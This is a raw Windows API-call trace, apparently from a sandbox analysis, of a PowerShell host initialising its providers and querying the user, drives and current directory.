	[0211.799] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.799] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x354) returned 0x0
	[0211.799] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.799] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x358) returned 0x0
	[0211.799] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.799] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x35c) returned 0x0
	[0211.799] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0211.799] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x5
	[0212.590] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x0) returned 0x2
	[0212.591] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x344) returned 0x0
	[0212.591] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29d6b8 | out: phkResult=0x29d6b8*=0x368) returned 0x0
	[0213.537] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9c0008
	[0213.791] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd09e0*="WSMan", lpRawData=0x2cd0750) returned 1
	[0213.803] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.803] CoTaskMemFree (pv=0x46eac0) 
	[0213.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.805] CoTaskMemAlloc (cb=0x804) returned 0x1b75f740
	[0213.805] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75f740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0213.805] CoTaskMemFree (pv=0x1b75f740) 
	[0213.805] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0213.805] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0213.805] CoTaskMemFree (pv=0x419e90) 
	[0213.806] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd6370*="Alias", lpRawData=0x2cd6100) returned 1
	[0213.818] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.818] CoTaskMemFree (pv=0x46eac0) 
	[0213.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.820] CoTaskMemAlloc (cb=0x804) returned 0x1b75f740
	[0213.820] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75f740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0213.821] CoTaskMemFree (pv=0x1b75f740) 
	[0213.821] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0213.821] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0213.821] CoTaskMemFree (pv=0x419e90) 
	[0213.821] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cdb918*="Environment", lpRawData=0x2cdb6a8) returned 1
	[0213.850] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.850] CoTaskMemFree (pv=0x46eac0) 
	[0213.851] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.851] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0213.851] CoTaskMemFree (pv=0x46eac0) 
	[0213.851] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.851] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0213.851] CoTaskMemFree (pv=0x46eac0) 
	[0213.851] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x29d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0213.852] SetErrorMode (uMode=0x1) returned 0x1
	[0213.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x29d6d0 | out: lpFileInformation=0x29d6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.852] SetErrorMode (uMode=0x1) returned 0x1
	[0213.853] GetLogicalDrives () returned 0x4
	[0213.853] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29d230, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.854] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.854] SetErrorMode (uMode=0x1) returned 0x1
	[0213.855] CoTaskMemAlloc (cb=0x68) returned 0x47be10
	[0213.855] CoTaskMemAlloc (cb=0x68) returned 0x47be80
	[0213.855] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x47be10, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x29d6a0, lpMaximumComponentLength=0x29d69c, lpFileSystemFlags=0x29d698, lpFileSystemNameBuffer=0x47be80, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x29d6a0*=0x705ba84c, lpMaximumComponentLength=0x29d69c*=0xff, lpFileSystemFlags=0x29d698*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0213.855] CoTaskMemFree (pv=0x47be10) 
	[0213.855] CoTaskMemFree (pv=0x47be80) 
	[0213.855] SetErrorMode (uMode=0x1) returned 0x1
	[0213.855] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.856] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.856] SetErrorMode (uMode=0x1) returned 0x1
	[0213.856] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d640 | out: lpFileInformation=0x29d640*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.857] SetErrorMode (uMode=0x1) returned 0x1
	[0213.857] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.857] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.857] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.858] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.858] SetErrorMode (uMode=0x1) returned 0x1
	[0213.858] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d470 | out: lpFileInformation=0x29d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.858] SetErrorMode (uMode=0x1) returned 0x1
	[0213.858] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.858] SetErrorMode (uMode=0x1) returned 0x1
	[0213.858] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d470 | out: lpFileInformation=0x29d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.858] SetErrorMode (uMode=0x1) returned 0x1
	[0213.859] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.859] SetErrorMode (uMode=0x1) returned 0x1
	[0213.859] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29d510 | out: lpFileInformation=0x29d510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.859] SetErrorMode (uMode=0x1) returned 0x1
	[0213.859] CoTaskMemAlloc (cb=0x804) returned 0x1b75f740
	[0213.859] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75f740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0213.859] CoTaskMemFree (pv=0x1b75f740) 
	[0213.859] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0213.859] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0213.860] CoTaskMemFree (pv=0x419e90) 
	[0213.860] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce2970*="FileSystem", lpRawData=0x2ce2700) returned 1
	[0213.881] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.881] CoTaskMemFree (pv=0x46eac0) 
	[0213.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.883] CoTaskMemAlloc (cb=0x804) returned 0x1b75f740
	[0213.883] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b75f740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0213.883] CoTaskMemFree (pv=0x1b75f740) 
	[0213.883] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0213.883] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0213.883] CoTaskMemFree (pv=0x419e90) 
	[0213.883] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce8160*="Function", lpRawData=0x2ce7ef0) returned 1
	[0213.957] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0213.958] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.958] CoTaskMemFree (pv=0x46eac0) 
	[0219.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.255] CoTaskMemAlloc (cb=0x804) returned 0x1b760740
	[0219.255] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b760740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0219.759] CoTaskMemFree (pv=0x1b760740) 
	[0219.759] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0219.759] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0219.759] CoTaskMemFree (pv=0x419e90) 
	[0219.759] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d1a4e8*="Registry", lpRawData=0x2d1a278) returned 1
	[0220.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0220.171] CoTaskMemAlloc (cb=0x804) returned 0x1b760740
	[0220.171] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b760740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0220.172] CoTaskMemFree (pv=0x1b760740) 
	[0220.172] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0220.172] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0220.172] CoTaskMemFree (pv=0x419e90) 
	[0220.172] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d1f8b0*="Variable", lpRawData=0x2d1f640) returned 1
	[0220.213] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0220.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.213] CoTaskMemFree (pv=0x46eac0) 
	[0220.215] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0220.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0220.215] CoTaskMemFree (pv=0x46eac0) 
	[0220.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0220.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0223.418] CoTaskMemAlloc (cb=0x804) returned 0x1b760740
	[0223.418] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b760740, nSize=0x29d918 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29d918) returned 0x1
	[0223.418] CoTaskMemFree (pv=0x1b760740) 
	[0223.419] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0223.419] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29d958 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29d958) returned 1
	[0223.419] CoTaskMemFree (pv=0x419e90) 
	[0223.419] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d33478*="Certificate", lpRawData=0x2d33208) returned 1
	[0224.070] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.070] CoTaskMemFree (pv=0x46eac0) 
	[0224.073] GetLogicalDrives () returned 0x4
	[0224.073] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0224.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0224.074] CoTaskMemAlloc (cb=0x20e) returned 0x40b300
	[0224.074] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x40b300 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0224.074] CoTaskMemFree (pv=0x40b300) 
	[0224.075] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.075] CoTaskMemFree (pv=0x46eac0) 
	[0224.075] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.075] CoTaskMemFree (pv=0x46eac0) 
	[0224.091] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.091] CoTaskMemFree (pv=0x46eac0) 
	[0224.096] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.096] CoTaskMemFree (pv=0x46eac0) 
	[0224.098] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.098] SetErrorMode (uMode=0x1) returned 0x1
	[0224.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d560 | out: lpFileInformation=0x29d560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.098] SetErrorMode (uMode=0x1) returned 0x1
	[0224.098] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d300, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.098] SetErrorMode (uMode=0x1) returned 0x1
